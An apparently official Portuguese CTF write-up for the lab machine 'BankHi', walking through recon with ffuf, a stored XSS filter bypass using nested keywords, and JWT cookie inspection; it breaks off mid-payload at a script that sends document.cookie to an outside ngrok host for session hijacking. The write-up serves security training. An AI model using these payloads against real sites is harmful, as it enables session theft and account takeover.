<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>UHCV32 - (Classificatória - Web) Official Write-Up - BankHi</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code-wrap {
	white-space: pre-wrap;
	word-break: break-all;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark {
	text-decoration: none;
	max-height: 8em;
	padding: 0;
	display: flex;
	width: 100%;
	align-items: stretch;
}

.bookmark-title {
	font-size: 0.85em;
	overflow: hidden;
	text-overflow: ellipsis;
	height: 1.75em;
	white-space: nowrap;
}

.bookmark-text {
	display: flex;
	flex-direction: column;
}

.bookmark-info {
	flex: 4 1 180px;
	padding: 12px 14px 14px;
	display: flex;
	flex-direction: column;
	justify-content: space-between;
}

.bookmark-image {
	width: 33%;
	flex: 1 1 180px;
	display: block;
	position: relative;
	object-fit: cover;
	border-radius: 1px;
}

.bookmark-description {
	color: rgba(55, 53, 47, 0.6);
	font-size: 0.75em;
	overflow: hidden;
	max-height: 4.5em;
	word-break: break-word;
}

.bookmark-href {
	font-size: 0.75em;
	margin-top: 0.25em;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: "SFMono-Regular", Consolas, "Liberation Mono", Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, YuMincho, "Yu Mincho", "Hiragino Mincho ProN", "Hiragino Mincho Pro", "Songti TC", "Songti SC", "SimSun", "Nanum Myeongjo", NanumMyeongjo, Batang, serif; }
.mono { font-family: iawriter-mono, Nitti, Menlo, Courier, monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, "SFMono-Regular", Consolas, "Liberation Mono", Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, YuMincho, "Yu Mincho", "Hiragino Mincho ProN", "Hiragino Mincho Pro", "Songti TC", "Songti SC", "SimSun", "Nanum Myeongjo", NanumMyeongjo, Batang, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-454645 {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-454645_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-454645 {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-454645_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}
.select-value-color-default { background-color: rgba(206,205,202,0.5); }
.select-value-color-454645 { background-color: rgba(155,154,151, 0.4); }
.select-value-color-brown { background-color: rgba(140,46,0,0.2); }
.select-value-color-orange { background-color: rgba(245,93,0,0.2); }
.select-value-color-yellow { background-color: rgba(233,168,0,0.2); }
.select-value-color-green { background-color: rgba(0,135,107,0.2); }
.select-value-color-blue { background-color: rgba(0,120,223,0.2); }
.select-value-color-purple { background-color: rgba(103,36,222,0.2); }
.select-value-color-pink { background-color: rgba(221,0,129,0.2); }
.select-value-color-red { background-color: rgba(255,0,26,0.2); }

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="44017986-f47d-4b21-902d-7498a53f2faa" class="page sans"><header><img class="page-cover-image" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/background2.png" style="object-position:center 38.57000000000001%"/><div class="page-header-icon page-header-icon-with-cover"><img class="icon" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/iconmoney.png"/></div><h1 class="page-title">UHCV32 - (Classificatória - Web) Official Write-Up - BankHi</h1><table class="properties"><tbody><tr class="property-row property-row-multi_select"><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesMultipleSelect"><path d="M4,3 C4,2.447715 4.447715,2 5,2 L12,2 C12.5523,2 13,2.447716 13,3 C13,3.55228 12.5523,4 12,4 L5,4 C4.447715,4 4,3.55228 4,3 Z M4,7 C4,6.447715 4.447715,6 5,6 L12,6 C12.5523,6 13,6.447716 13,7 C13,7.55228 12.5523,8 12,8 L5,8 C4.447715,8 4,7.55228 4,7 Z M4,11 C4,10.447715 4.447715,10 5,10 L12,10 C12.5523,10 13,10.447716 13,11 C13,11.55228 12.5523,12 12,12 L5,12 C4.447715,12 4,11.55228 4,11 Z M2,4 C1.44771525,4 1,3.55228475 1,3 C1,2.44771525 1.44771525,2 2,2 C2.55228475,2 3,2.44771525 3,3 C3,3.55228475 2.55228475,4 2,4 Z M2,8 C1.44771525,8 1,7.55228475 1,7 C1,6.44771525 1.44771525,6 2,6 C2.55228475,6 3,6.44771525 3,7 C3,7.55228475 2.55228475,8 2,8 Z M2,12 C1.44771525,12 1,11.5522847 1,11 C1,10.4477153 1.44771525,10 2,10 C2.55228475,10 3,10.4477153 3,11 C3,11.5522847 2.55228475,12 2,12 Z"></path></svg></span>vulns and exploitations</th><td><span class="selected-value select-value-color-red">Hijacking</span><span class="selected-value select-value-color-454645">Session Hijacking</span><span class="selected-value select-value-color-blue">lib hijacking</span><span class="selected-value select-value-color-default">path hijacking</span><span class="selected-value select-value-color-red">python</span><span class="selected-value select-value-color-orange">reversing</span></td></tr></tbody></table></header><div class="page-body"><h3 id="19917e8e-c588-4d72-b34e-9a4b87b92539" class="">Escrito por: Vinicius (big0us)<mark class="highlight-yellow"> </mark><mark class="highlight-teal"> </mark></h3><p id="71fc2770-52a0-47bb-a0f8-8c007fd89d8d" class="">Tenho 16 anos, jogo CTF faz alguns meses e também participo do UHC aos finais de semanas. Essa máquina foi feita por mim para o UHC. Os arquivos dela e o Dockerfile estarão no meu GitHub.</p><ul id="2fecab5f-4287-4272-ba7f-c7739163f63f" class="toggle"><li><details open=""><summary>Perfis</summary><figure id="4f2ae128-20e5-4473-b16b-1c8f845ba59b"><a href="https://github.com/viniciuspereiras/" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">viniciuspereiras - Overview</div><div class="bookmark-description">as vezes &quot;big0us&quot; for fun :). viniciuspereiras has one repository available. Follow their code on GitHub.</div></div><div class="bookmark-href"><img src="https://github.com/favicon.ico" class="icon bookmark-icon"/>https://github.com/viniciuspereiras/</div></div><img src="https://avatars2.githubusercontent.com/u/69733777?s=400&amp;u=0132e5e4a44d7bd0eb01176e2187618a1f7aa887&amp;v=4" class="bookmark-image"/></a></figure><figure id="6d61a603-458f-4ab2-b720-a5d2b4828563"><a href="https://tryhackme.com/p/big0us" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">TryHackMe | big0us</div><div class="bookmark-description">TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!</div></div><div class="bookmark-href"><img src="https://assets.tryhackme.com/img/favicon.png" class="icon bookmark-icon"/>https://tryhackme.com/p/big0us</div></div><img src="https://tryhackme-images.s3.amazonaws.com/user-avatars/acbda194c8e42a3049fb6ffcbf6dc290.png" class="bookmark-image"/></a></figure><figure id="08d97809-8c95-4406-a3bf-d3bd41641da9"><a href="https://www.hackthebox.eu/home/users/profile/406363" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">Hack The Box :: Penetration Testing Labs</div><div class="bookmark-description">Login to the Hack The Box platform and take your pen-testing and cyber security skills to the next level!</div></div><div class="bookmark-href"><img src="https://www.hackthebox.eu/images/favicon.png" class="icon bookmark-icon"/>https://www.hackthebox.eu/home/users/profile/406363</div></div><img src="https://www.hackthebox.eu/images/favicon.png" class="bookmark-image"/></a></figure></details></li></ul><p id="8421bc73-a2c7-4260-8ee1-1276785454bb" class="">
</p><p id="69b9f47f-8844-43a9-9f7f-9f2dfe271184" class="">Essa máquina foi feita pensando na exploração de técnicas de Hijacking. </p><pre id="e30fe96e-7135-405b-8db1-419d8273bc53" class="code"><code>easter egg → bank name = Hi          
						 name of background image = jack.jpg
						 team developer name = jack
HiJack - Hijacking :) </code></pre><p id="ee5590ef-bfaa-4cc6-ad84-7faf7de9fc33" class="">
</p><p id="5ccbe381-fe66-41a9-8953-0c50878b87e8" class="">
</p><h1 id="ae2fb5f6-4da4-4a7c-b750-08675dc664bc" class="">Recon</h1><p id="41e1a499-08a4-4245-b58b-8b2ffd790608" class="">
</p><figure id="e2a4fda9-207d-4d13-b6b7-4478ac198ded" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled.png"><img style="width:624px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled.png"/></a></figure><p id="e99a322d-b23b-4c32-8bed-8fe9b2618c79" class="">A página principal parece ser de um banco normal, dando uma lida percebemos que existe uma sessão sobre o time do banco:
</p><figure id="ce5cc2c8-ff9d-4e81-9627-a7b4222a5f51" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%201.png"><img style="width:576px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%201.png"/></a></figure><p id="e2bd3731-92c7-49d3-9334-a39a70659381" class="">Ok, já sabemos o nome de possíveis usuários administradores!</p><p id="0197ad1c-c6ce-4cfa-86f1-5adfddab9aa2" class="">Dando mais uma navegada podemos encontrar uma página um tanto quanto interessante:</p><p id="55edefd8-37de-4905-8e17-15776060c824" class="">
</p><figure id="4ef59e24-a6d4-4db6-ad42-0031f841a702" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%202.png"><img style="width:432px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%202.png"/></a></figure><p id="663c2d40-f3df-4fee-870b-48a785dd1440" class="">Parece que o Banco tem um programa próprio de Bug Bounty (recompensa por bugs).</p><p id="32f415db-cd8d-47e2-8a19-082ddffa98b7" class="">
</p><p id="066d9c44-c773-44ce-9e71-ea602520cdbc" class="">Mesmo assim vamos fazer um fuzzing no site.</p><pre id="425fd436-0c4a-4a1d-b263-88db2ac17582" class="code"><code>ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u &#x27;https://bankhi.uhclabs.com/FUZZ&#x27; -c</code></pre><figure id="77205f69-1066-4d2c-adb8-27742d18b016" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%203.png"><img style="width:624px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%203.png"/></a></figure><p id="b8be31a7-c72a-4e95-a731-11abffc359c3" class="">
</p><p id="debd497a-f739-4cdb-b1c4-a8e8d5b058d7" class="">É, nada de interessante, todas essas pastas com status 301 estão com acesso negado 😢.</p><p id="9ecbff47-9fea-4d59-a10a-9df703626e9c" class="">
</p><p id="03ee805e-9901-479f-97cf-4a83698b0b85" class="">Vamos ver esse tal programa de BugBounty e fazer um fuzzing nele:</p><pre id="bd576408-a89c-4e3f-8bc7-86da5905e82d" class="code"><code>ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u &#x27;https://bankhi.uhclabs.com/bugbounty/FUZZ&#x27; -c</code></pre><p id="53eb92f2-d8bb-4963-a1b3-6637b65a6063" class="">
</p><figure id="e620e2e7-9595-4627-9894-5cfe4bbd94ec" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%204.png"><img style="width:640px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%204.png"/></a></figure><p id="f2e84307-fadd-4d7e-8a96-62cae308ee07" class="">Só retornou um diretório de uploads, mas não existe directory listening. Talvez se usássemos outra wordlist eu teria pego index.php, login.php, report.php...</p><p id="54d73409-2d34-43b0-a420-4bcb2b983a40" class="">Temos de cara uma página de login e um link para criar usuários. (login.php)</p><p id="bff79529-267e-40b5-b04e-38181393ba0d" class="">
</p><figure id="a8c9e5ea-8a91-4665-a743-3c95597c0831" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%205.png"><img style="width:624px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%205.png"/></a></figure><p id="4efc3993-76f7-47d4-8ebe-5b4cbf79c74d" class="">Os três botões ali em cima eu preciso estar autenticado para usar, depois de testar algumas credenciais padrão e não ter sucesso vamos criar um user!</p><p id="7fbf9c73-4122-4b95-befe-27b7e0818904" class="">Depois de criar um user e logar, temos acesso ao index.php</p><p id="23c337dd-971d-4e4a-a2f6-bd904d6fb4f4" class="">
</p><figure id="5fd321d1-c0e9-487c-bc9b-f1cf5e937eb3" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%206.png"><img style="width:672px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%206.png"/></a></figure><p id="01fe3af6-3545-4de4-a96e-ab23fafcb63a" class="">Dando uma olhada no source code... Temos nossa primeira flag.</p><figure id="f0ce5d80-d656-4c74-ad36-047d9f83c7d3" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%207.png"><img style="width:439px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%207.png"/></a></figure><p id="b08c6c75-98a5-4b2d-a33f-649939a48c62" class="">Parece ser uma página de reports. É importante ressaltar que os admins podem ver nossos reports 🤔.</p><p id="c115ce51-378a-4068-a63a-f0e589a77485" class="">Vamos fazer um report:</p><p id="7d8593cd-bec9-4544-b90f-6a245caf29f6" class="">
</p><figure id="673c89e2-e7de-429f-81e0-528417afa729" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%208.png"><img style="width:384px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%208.png"/></a></figure><figure id="2b06cdc1-1e6c-4e58-8892-f148b4bada75" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%209.png"><img style="width:191px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%209.png"/></a></figure><p id="6c7bdbf5-417a-4db1-91c3-41789bcaca9f" class="">Agora vamos ver como ele se faz no código html:</p><pre id="c3615910-4bd0-4de3-b1ac-95f632d90686" class="code"><code>
&lt;h5 class=&#x27;card-title&#x27;&gt;test&lt;/h5&gt;
&lt;h6 class=&#x27;card-subtitle mb-2 text-muted; text-warning&#x27;&gt;Open&lt;/h6&gt;
&lt;p class=&#x27;card-text text-info&#x27;&gt;From: vinicius&lt;/p&gt;
&lt;p class=&#x27;card-text&#x27;&gt;test&lt;/p&gt;</code></pre><h1 id="c5f609da-efc4-48f7-b22d-4f93da0555af" class="">Exploitation</h1><p id="531ecee4-c598-48aa-8b44-e3520db062c3" class="">Ok, vamos testar um XSS aqui, não é muito comum em CTFs mas se os admins realmente verem nossos reports provavelmente poderemos executar scripts maliciosos na página deles.</p><pre id="4e33036e-b898-405b-b4c2-96f5cd03df29" class="code"><code>&lt;script&gt; alert(&#x27;xss&#x27;) &lt;/script&gt;</code></pre><p id="62b6077d-84ce-4d36-94d4-58cb8e9e1ad2" class="">Vou usar o clássico dos clássicos</p><p id="189b4f92-7bb1-459a-8415-ccf9e659693b" class="">
</p><figure id="c43fdc8f-5ea4-4fd0-bb3f-9b62809e9dbe" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2010.png"><img style="width:240px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2010.png"/></a></figure><figure id="324fc6f2-aff5-47e3-99d6-605a6a31eb70" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2011.png"><img style="width:336px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2011.png"/></a></figure><p id="193c148d-5a55-492c-b50c-553cd817c8f6" class="">Interessante... Parece que a aplicação removeu nosso script e nosso alert (muito comum os sites bloquearem o alert...) Parece que teremos que fazer um bypass disso, normalmente podemos inserir uma palavra proibida dentro de outra, assim quando a aplicação remover a palavra proibida, vai concatenar a nossa palavra.</p><figure id="06f91853-9d59-4eda-bbe2-8d96b2876f30" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2012.png"><img style="width:288px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2012.png"/></a></figure><p id="e72be631-5271-42c5-b670-5714333aafc0" class="">Nossa payload:</p><pre id="ebcb9381-0bff-4772-b0d1-486d005d0b79" class="code"><code>&lt;scrscriptipt&gt; alealertrt(&#x27;xss&#x27;) &lt;/scrscriptipt&gt;</code></pre><p id="c410f62a-f0d3-4adb-9102-adb942fd97ac" class="">Vamos enviar e ver se da certo.</p><figure id="9223b1b4-3e18-4809-9ebb-7900311bd89e" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2013.png"><img style="width:707px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2013.png"/></a></figure><p id="5ebb90fd-57e7-45d5-b3a3-1e04409f93e2" class="">Bom parece que o site está vulnerável a XSS storage, vamos pesquisar o que podemos fazer com isso... Hm, Session Hijacking, podemos roubar cookies dos usuários que verem nosso report (admins ?).</p><p id="2881450c-9153-4f38-9a02-92c06e9d3a43" class="">
</p><figure id="4ebce768-d2ab-4b2e-bc45-0bc102f8d65b" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2014.png"><img style="width:661px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2014.png"/></a></figure><p id="6d147475-b288-44f3-bae2-4d980ce3cbc7" class="">Temos um cookie de um token JWT com nosso usuário. Vamos desencodar.</p><p id="5f67cbb0-2c15-4b88-89bb-9168772e2a0a" class="">
</p><figure id="8efe0bea-a3ee-4e00-9c37-2e577e6fdfce" class="image"><a href="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2015.png"><img style="width:989px" src="UHCV32%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%2044017986f47d4b21902d7498a53f2faa/Untitled%2015.png"/></a></figure><p id="e6e8b210-772c-4053-aa6d-e6147e76d788" class="">Uid significa UserId, normalmente usado para dizer os privilégios de cada usuário. Como não temos a chave do token não podemos alterar esse valor. Porém sabemos que cada usuário tem um token e com esse token poderiamos roubar a sessão do usuário (Session Hijacking).</p><h3 id="baab46be-9d9d-43e3-bff9-6f1d46abda96" class="">Session Hijacking</h3><p id="31bcd9bd-8e19-47c8-935f-3abf062bff45" class="">Vamos procurar alguma payload, vou usar essa: </p><pre id="6f1537de-c7e0-48cc-9e74-94f1b038ddd8" class="code"><code>&lt;scrscriptipt&gt;
new Image().src=&#x27;2.tcp.ngrok.io:17224/&#x27;+(document.cookie);
